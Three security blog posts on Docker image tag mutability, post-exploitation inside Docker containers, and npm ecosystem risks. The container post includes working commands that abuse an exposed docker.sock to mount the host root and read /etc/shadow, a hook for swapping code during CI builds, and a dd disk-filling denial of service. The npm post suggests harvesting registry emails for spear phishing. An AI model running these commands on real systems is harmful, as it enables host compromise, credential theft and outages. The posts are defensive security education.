Potential risks of using the Docker Registry

Some people recommend using your own private registry for your images instead of the public one. The real problem arises when you do not have full control of the images. Let me walk through an example.

Chain of images

Do you know how many images you store every time you pull an unknown image? You can use this tool to generate a graph like mine:

Image chain tree (even though I removed lots of old images last week)

The truth is that when you are preparing your own image you don't think too much about the ones in the middle, do you? But will you notice if a layer in the middle changes?

1. Create an image `harmless`

$ docker pull busybox
$ docker run busybox touch /harmless
$ docker commit fbea5a2af7b4 martes13/harmless:1.0
$ docker push martes13/harmless:1.0

2. Let it be consumed

$ docker build .
Sending build context to Docker daemon 2.048 kB
Sending build context to Docker daemon
Step 0 : FROM martes13/harmless:1.0
---> 177b857f26b2
Step 1 : RUN touch /helloworld
---> Using cache
---> 3956484611c5
Step 2 : CMD /bin/sh
---> Running in 22425198de95
---> 62577fd6e477
Removing intermediate container 22425198de95
Successfully built 62577fd6e477
$ docker run -it 62577fd6e477
/ # ls
[..] harmless    helloworld [..]

3. Transform `harmless` into `harmful`

$ docker pull martes13/harmless:1.0
$ docker run martes13/harmless:1.0 touch /harmful
$ docker commit 4dd3248e115a martes13/harmless:1.0
$ docker push martes13/harmless:1.0

4. Let all consumers update progressively

$ docker build .
[..]
$ docker run -it 7924ddc5e198
/ # ls
[..]        harmful     harmless    helloworld    [..]

What happened?

Maybe you did not notice, but we updated an old version (1.0) to point at a new image. You might think you are using something well tested that will not change, but it did. So if an attacker manages to steal your account full of widely used images, they will be able to modify every version and spread something evil to all your fans.

Solutions

Well, official images are out of scope here. Their signature is verified, so they “cannot” be changed.

Also, the newest version, 1.6 (we are on 1.5 now), has a new feature that lets you pull while verifying the digest (sha256), so you will be able to detect any change. We will have image:tag or image@digest. Sounds good.
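
For illustration, a pull pinned to a digest would look like the line below; the digest value is a placeholder for the sha256 that is printed when the image is pushed:

$ docker pull martes13/harmless@sha256:<digest-printed-at-push-time>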

Until then, I propose two solutions:

1. Create your own private registry and ensure that the root images do not change (read my last post)

2. Apply unit tests when your new image is built. As everything in your image is a file, just ensure that nothing unexpected is there (a diff against the last build?). If something changed, halt the pipeline until a human QA verifies it. See the sketch below.
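
As a minimal sketch of solution 2 (the `myimage:old` and `myimage:new` tags are illustrative), checksum every file in the previous and the new build, then diff the two lists:

$ docker run --rm myimage:old find / -type f ! -path "/sys*" ! -path "/proc*" -exec md5sum {} + | sort > old.md5
$ docker run --rm myimage:new find / -type f ! -path "/sys*" ! -path "/proc*" -exec md5sum {} + | sort > new.md5
$ diff old.md5 new.md5 || echo "unexpected change: halt until human QA verifies it"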

PS: Today Docker got $95M of investment…


Practical Security inside a Dockerized Network

Imagine you have a bash shell on a machine and then realize it's a Docker container. How would you proceed to go deeper?

Step 1. Understand your container

Usually you won't be able to use 0-days against the kernel, but you won't find extra security measures either (except when running as a non-root user). Attack vectors and methodologies haven't changed at all, but this context is a bit special.

You are in a container that can disappear at any moment. It's probably stateless and has a single responsibility. The operating system is quite safe by default because it runs with minimal capabilities. Forget about leaving a bind shell (or a reverse one) and coming back later: they only need to patch, build, push, pull and deploy. Maybe 10 minutes? Time runs against you.

As soon as you obtain a bash shell (somehow), you must reverse-engineer the definition of this container. There are two elements to figure out:

Dockerfile: instructions write files, so you only need to diff against the original image. Even if the original is not in a public registry, diffing against a basic image (e.g. busybox, ubuntu, debian, fedora, …) could be enough.

$ find / -type f ! -path "/sys*" ! -path "/proc*" -exec md5sum {} +

docker arguments: these are the keys for pivoting. Try to reconstruct the original “docker run …” command line.

Volumes:
$ mount
$ df

Links:
$ ip addr
$ cat /etc/hosts

Environment (+ ports):
$ env

Step 2. Find the weakest point

The most common vulnerability, now and forever, will be default and wrong configurations: human mistakes. Understand the platform and try to extract sensitive data using the designed flow. Probably it's so loose that you will be able to dump the full database.

I have seen several Docker-related projects use this line:

$ docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu

(or exposed as host:port, with or without SSL). Install socat to connect to the socket:

$ apt-get install socat
$ socat TCP4-LISTEN:1337,fork UNIX-CONNECT:/var/run/docker.sock &

Then, read the docs: https://docs.docker.com/reference/api/. You have several options. For example, you could export other containers as raw data, or create a new container that mounts the host's root directory as a folder. You can fully compromise the machine in this scenario and, most importantly, you will have a lot of critical information to use against the internal network.
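
As a rough sketch of that last idea against the Remote API, through the socat relay from above (the /host mount point and the container ID are illustrative):

$ curl http://localhost:1337/containers/json
$ curl -X POST -H "Content-Type: application/json" \
    -d '{"Image":"ubuntu","Cmd":["cat","/host/etc/shadow"],"HostConfig":{"Binds":["/:/host"]}}' \
    http://localhost:1337/containers/create
$ curl -X POST http://localhost:1337/containers/<id>/start
$ curl "http://localhost:1337/containers/<id>/logs?stdout=1"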

Another, far more complex vector is to take advantage of ephemeral processes that may be running on our compromised machine and open new vulnerabilities on other machines. For example, a Jenkins instance uses our compromised development machine to build and push a new image to the registry. You can use tools like `inotify` to detect this process and, if there is a shared volume (a common data pattern), change the code before it's pushed.
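
A hypothetical sketch with inotify-tools (the /shared/src path is illustrative):

$ apt-get install inotify-tools
$ inotifywait -m -r -e modify,create /shared/src | while read dir event file; do
>     echo "[build activity] $event $dir$file"    # this is where you would swap in the payload
> done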

Step 3. Complementary software

In real production environments it is not common to execute raw docker commands to start processes. The tools used instead are quickly identified, as they don't expect you to be there.

Docker Compose exposes all the linked containers, with their ports, as environment variables, as shown below. However, tools like this are going to be hell for an intruder: it's pretty easy to set volumes as read-only, limit CPU, memory, etc.
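
For example, from inside a container linked to a database, something like this reveals its neighbours (the variable names follow Docker's link convention; the values are illustrative):

$ env | grep _PORT_
DB_PORT_5432_TCP_ADDR=172.17.0.12
DB_PORT_5432_TCP_PORT=5432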

Supervisord is a process control system that works as PID 1 and manages the sub-processes in that container. If you are lucky enough to have sufficient access, you will find the logs of all running applications in /var/log/supervisor/. If the app was run directly as a command/entrypoint, I think you cannot obtain this information.

Docker-registry is a private repository and is, without a doubt, your goal. Maybe you can scan the whole internal network looking for the default port 5000 open, or you can try to guess its backend (S3?) and retrieve the images, or you can access the Redis instance used as a cache, etc. The registry doesn't provide authentication directly; it has to be provided by extra tools (nginx, …) or by what is called an Index Auth service. So if you find the HTTP(S) API, start with GET /v1/search and dump everything. You will also be able to push something.
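
A quick sketch of that enumeration (the hostname is illustrative):

$ curl "http://registry.internal:5000/v1/search?q="
$ curl http://registry.internal:5000/v1/repositories/<namespace>/<repo>/tags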

An example of what I'm talking about: http://blog.programster.org/2015/03/17/run-your-own-private-docker-registry/ . It's protected from the outside (SSL + firewall), but once you are inside a container you have free access to any image.

Consul provides domain resolution and a key/value store. It has a security model against MITM and other attacks, and also an ACL feature. However, ACLs are disabled by default. (It's another great tool that deserves a mention.)

There are a bunch of new tools appearing that use docker to optimize a specific kind of task. They tend to have some kind of security in mind, but it must be enabled and properly configured. Quick-and-dirty feature development, not enough QA work, use of beta or alpha versions, etc. are the keys to finding a bogus system.

Bonus. Denial of Service

If you want to crash the machine directly (affecting more than your container), probably the easiest option is:

$ dd if=/dev/zero of=/fileOrPartition (or /mounted_volume_file)

Docker is able to limit CPU, memory, swap, … but it still doesn't let you limit the hard drive. You can probably fill it up, and something will crash.

Conclusion

This article was quite simple, but I don't like it when people talk about security in docker from a purely theoretical viewpoint. Hope you enjoyed it. (And yes, obtaining a shell in a container is NOT trivial.)

More advice here: https://github.com/GDSSecurity/Docker-Secure-Deployment-Guidelines


State of the Art :: node's security

These days I have been working on designing a REST API in NodeJS and discovering some security bugs in our third-party libraries. I am very worried because you cannot avoid using them, and you know that if you can find some bugs, there will be other, more dangerous bugs in there.

I am surprised how fast NodeJS has spread, but it is easy to understand when you watch some Google I/O talks. The V8 engine is wonderful. It was developed from scratch, focusing on performance as much as possible. If we compare it against an Apache webserver (multi-process/multi-thread), they have compressed all the different independent layers into one, being able to optimize the whole stack, but removing all the “sometimes useful” features (like “data isolation”).

From my point of view, we have to move in this direction (reducing your hardware costs is a must), but it comes with new challenges for developers. It reminds me of Android from when I was researching that platform, because in the end both of them have bugs that are well known in “““deprecated””” software (like Apache?).

And that is why last week I joined the nodesecurity.io group. I want to contribute to the NodeJS community and give advice about the common (and not so common) mistakes made when developing an application. Very often they are technical bugs, because we could not use an ORM or good enough authentication/authorization layers, or because we used functions like eval, but on some occasions they are functional bugs that you cannot solve with a patch, because they depend on the behavior/workflow of your application.

I think that security is very close to reading metrics, applying automation and testing, and then developing tools that help you discover bottlenecks or shortcomings. Thanks to GitHub, the dependency manager and NodeJS itself, it is easy to discover potential risks (and exploit them).

So, because this is the first post, I am going to start writing about the dependency manager.

npm registry

The project uses a CouchDB database to store all the applications & users. Although we lack the privileges to retrieve information from these databases directly, we can take advantage of the proxy and download both databases via these URLs: https://registry.npmjs.org/-/all/ && https://registry.npmjs.org/-/users/ . Why would you want >44,000 email addresses from a single place? I propose a ‘spear phishing’ experiment, but not today.
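
If you want to reproduce it, two curl calls are enough (endpoints as listed above):

$ curl -o all.json https://registry.npmjs.org/-/all/
$ curl -o users.json https://registry.npmjs.org/-/users/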

We can also draw a graph from the application database, like this one:

Graph (made with LibreOffice 4)

We can see that the probability of using outdated software is considerable, and I am sure you agree that this directly increases the risk. We should check other factors, like “time alive”, “versions released” and “community”, but the graph gives a first idea. Some of you will think that a stable version is good enough to use, but remember that we are talking about NodeJS. One year ago, were we on v0.6 or v0.4? For example, I could not use node-gd/gd because they did not compile.

0.0.1

Because there are some tricks in npm that we should look at when we want to deploy and run our application, I developed a script that we can run at any time to check some information about our packages. Feel free to use it and add it to your git hooks (pre-commit), and… leave a comment if you think other features would be good 🙂 really appreciated!

https://gist.github.com/m13/0c564f93eefb97155302

Features:

– Check the npm-shrinkwrap.json file

– Check whether you have changed the npm config registry variable

– Check how many dependencies you have, sorted by last update

State of Art :: node’s security